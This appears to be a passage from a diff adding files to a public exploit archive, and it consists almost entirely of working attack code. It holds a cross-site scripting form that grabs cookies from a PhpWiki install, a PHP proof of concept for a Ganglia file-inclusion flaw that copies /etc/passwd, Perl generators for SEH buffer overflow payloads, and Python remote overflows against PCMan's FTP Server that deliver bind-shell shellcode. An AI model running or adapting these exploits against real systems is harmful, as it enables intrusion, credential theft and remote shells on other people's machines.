<form action="http://192.168.0.10/phpwiki/index.php/UserPreferences" method="POST">
<input type="hidden" name="pref&#91;email&#93;" value="" />
<input type="hidden" name="pref&#91;notifyPages&#93;" value="" />
<input type="hidden" name="pref&#91;theme&#93;" value="" />
<input type="hidden" name="pref&#91;lang&#93;" value="" />
<input type="hidden" name="pref&#91;editHeight&#93;" value="22" />
<input type="hidden" name="pref&#91;editWidth&#93;" value="80" />
<input type="hidden" name="pref&#91;timeOffset&#93;" value="0" />
<input type="hidden" name="pagename" value="UserPreferencesabc<&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script><&#33;&#45;&#45;" />
<input type="hidden" name="action" value="browse" />
<input type="submit" value="Go" />
</form>
</body>
</html>

38
platforms/php/webapps/38030.php Executable file
View file

@ -0,0 +1,38 @@
<?php
/*
################################################################################
#
# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)
# Desc : CVE-2012-3448 PoC
# Details : This PoC will create a dummy file in the /tmp folder and
# will copy /etc/passwd to /tmp.
# To modify the attack payload, modify the code below.\
# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0
#
################################################################################
1. Assuming that ganglia is installed on the target machine at this path:
/var/www/html/ganglia/
2. Assuming the attacker has minimal access to the target machine and
can write to "/tmp". There are several methods where a remote attacker can
also trigger daemons or other system processes to create files in "/tmp"
whose content is (partially) controlled by the remote attacker.
3. The attacker puts the contents of this PoC file into the file:
/tmp/attack.php
4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1
as:
http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY
5. Confirm that the PoC created a dummy file in the /tmp folder and copied
/etc/passwd to /tmp.
*/
eval('touch("/tmp/attacker.touch"); copy("/etc/passwd", "/tmp/attacker.passwd");');
die("Triggering CVE-2012-3448 attack.php");
?>

58
platforms/windows/dos/38028.pl Executable file
View file

@ -0,0 +1,58 @@
#*************************************************************************************************************
#
# Exploit Title: PFTP Server 8.0f (lite) SEH bypass technique tested on Win7x64
# Date: 8-29-2015
# Software Link: http://www.heise.de/download/the-personal-ftp-server-78679a5e8458e9faa7c5564617bdd4c4-1440883445-267104.html
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# There is a textfield within the program that asks for IPs to be blocked against the FTP server that is vulnerable to an SEH based buffer overflow.
#
# Side Notes: I haven't been able to implement a partial EIP overwrite for ASLR on this exploit, so I had to resort
# to manually adding an exception to ASLR in the registry for this to work.
# creds to Corelan & team: https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
#
# Edit HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ and add a new key called “MoveImages” (DWORD)
# set the key to '0'.
#
# Instructions:
# Generate the payload text file by running this payload creator as is. The payload is called: buffy.txt by default
# Next, open the pftp.exe program.
# Click 'options', 'advanced options', and 'block ip'. Click on the text field and paste
# in your payload generated by this payload creator and click 'Add'. It will look like this:
#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA됐31Ò²0dR RBr €~ 3uò‰Çx<WxÂz Ç1íÆE>Fatauò~Exituéz$Çf,ozÇ‹|¯üÇhytehkenBh Bro‰áþI 1ÀQPÿא
#
# that's it. You should then be greeted with a MessageBox.
#**************************************************************************************************************
my $junk = "A" x 272;
#$nseh = "\xcc\xcc\xcc\xcc"; # breakpoint for testing
$nseh = "\xeb\x10\x90\x90"; # jump to shellcode
$seh = pack('V',0x03033303); # popad, call ebp from \Device\HarddiskVolume1\Windows\Fonts\StaticCache.dat, which is outside the module range and has SEH off
#MessageBox Shellc0de
#https://www.exploit-db.com/exploits/28996/
my $shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
$nops = "\x90" x 20;
my $junk2 = "\x90" x 1000;
open(myfile,'>buffy.txt');
print myfile $junk.$nseh.$seh.$nops.$shellcode.$junk2;
close (myfile);

41
platforms/windows/dos/38031.pl Executable file
View file

File diff suppressed because one or more lines are too long

41
platforms/windows/local/38035.pl Executable file
View file

@ -0,0 +1,41 @@
#Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64
# Date: 8-31-2015
# Software Link: http://www.boxoft.com/wav-to-mp3/
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# Target: Windows 7 Enterprise x64
# CVE:
# Category: Local Exploit
#
# Description:
# A buffer overflow was found after constructing a .wav payload over 4000 characters and attempting to convert the payload to a .mp3 file
my $buff = "\x41" x 4132;
#my $nseh = "\x42" x 4;
#my $seh = "\x43" x 4;
my $endofbuff = "\x41" x 5860;
$nseh = "\xeb\x06\x90\x90"; # jump to shellcode
$seh = pack('V',0x0040144c); # pop pop retn
#MessageBox Shellc0de
#https://www.exploit-db.com/exploits/28996/
my $shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
#$nops = "\x90" x 20;
open(myfile,'>crash3r.wav');
print myfile $buff.$nseh.$seh.$shellcode.$endofbuff;
close (myfile);

62
platforms/windows/remote/38003.py Executable file
View file

@ -0,0 +1,62 @@
#!/usr/bin/python
# Exploit Title: PCMan's FTP Server v2.0 - GET command buffer overflow (remote shell)
# Date: 28 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3
# CVE : N/A
import socket
import sys
# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
shellcode = (
"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x69\x8c\x9b\xa3\x83\xee\xfc\xe2\xf4\x95\x64\x19\xa3"
"\x69\x8c\xfb\x2a\x8c\xbd\x5b\xc7\xe2\xdc\xab\x28\x3b\x80"
"\x10\xf1\x7d\x07\xe9\x8b\x66\x3b\xd1\x85\x58\x73\x37\x9f"
"\x08\xf0\x99\x8f\x49\x4d\x54\xae\x68\x4b\x79\x51\x3b\xdb"
"\x10\xf1\x79\x07\xd1\x9f\xe2\xc0\x8a\xdb\x8a\xc4\x9a\x72"
"\x38\x07\xc2\x83\x68\x5f\x10\xea\x71\x6f\xa1\xea\xe2\xb8"
"\x10\xa2\xbf\xbd\x64\x0f\xa8\x43\x96\xa2\xae\xb4\x7b\xd6"
"\x9f\x8f\xe6\x5b\x52\xf1\xbf\xd6\x8d\xd4\x10\xfb\x4d\x8d"
"\x48\xc5\xe2\x80\xd0\x28\x31\x90\x9a\x70\xe2\x88\x10\xa2"
"\xb9\x05\xdf\x87\x4d\xd7\xc0\xc2\x30\xd6\xca\x5c\x89\xd3"
"\xc4\xf9\xe2\x9e\x70\x2e\x34\xe4\xa8\x91\x69\x8c\xf3\xd4"
"\x1a\xbe\xc4\xf7\x01\xc0\xec\x85\x6e\x73\x4e\x1b\xf9\x8d"
"\x9b\xa3\x40\x48\xcf\xf3\x01\xa5\x1b\xc8\x69\x73\x4e\xc9"
"\x61\xd5\xcb\x41\x94\xcc\xcb\xe3\x39\xe4\x71\xac\xb6\x6c"
"\x64\x76\xfe\xe4\x99\xa3\x78\xd0\x12\x45\x03\x9c\xcd\xf4"
"\x01\x4e\x40\x94\x0e\x73\x4e\xf4\x01\x3b\x72\x9b\x96\x73"
"\x4e\xf4\x01\xf8\x77\x98\x88\x73\x4e\xf4\xfe\xe4\xee\xcd"
"\x24\xed\x64\x76\x01\xef\xf6\xc7\x69\x05\x78\xf4\x3e\xdb"
"\xaa\x55\x03\x9e\xc2\xf5\x8b\x71\xfd\x64\x2d\xa8\xa7\xa2"
"\x68\x01\xdf\x87\x79\x4a\x9b\xe7\x3d\xdc\xcd\xf5\x3f\xca"
"\xcd\xed\x3f\xda\xc8\xf5\x01\xf5\x57\x9c\xef\x73\x4e\x2a"
"\x89\xc2\xcd\xe5\x96\xbc\xf3\xab\xee\x91\xfb\x5c\xbc\x37"
"\x6b\x16\xcb\xda\xf3\x05\xfc\x31\x06\x5c\xbc\xb0\x9d\xdf"
"\x63\x0c\x60\x43\x1c\x89\x20\xe4\x7a\xfe\xf4\xc9\x69\xdf"
"\x64\x76")
# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
# bad data is a string of 2007 "A" characters to get to an EIP overwrite
# followed by the JMP ESP instruction 0x7c9d30eb in SHELL32.dll
baddata = '\x41'*2007+'\xeb\x30\x9d\x7c'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# change target IP/port as needed
# run this script then to connect use nc for your windows shell
# nc [target IP address] 4444
connect=s.connect(('192.168.1.135',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('GET ' + baddata +'\x90'*15+ shellcode+ '\r\n')
s.close()

57
platforms/windows/remote/38013.py Executable file
View file

@ -0,0 +1,57 @@
#!/usr/bin/python
# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
# Date: 29 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3
import socket
import sys
# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
shellcode = (
"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17"
"\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f"
"\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b"
"\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4"
"\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6"
"\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7"
"\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62"
"\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92"
"\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16"
"\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc"
"\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60"
"\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92"
"\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d"
"\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73"
"\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40"
"\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c"
"\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79"
"\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4"
"\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16"
"\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5"
"\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e"
"\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28"
"\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b"
"\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0"
"\x2d\xc2")
# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
# bad data is a string of 2004 "A" characters to get to a EIP overwrite
# followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dll
baddata = '\x41'*2004+'\xed\x8e\xb4\x7c'
# login to ftp followed by sending the bad data & payload
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.135',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n')
s.close()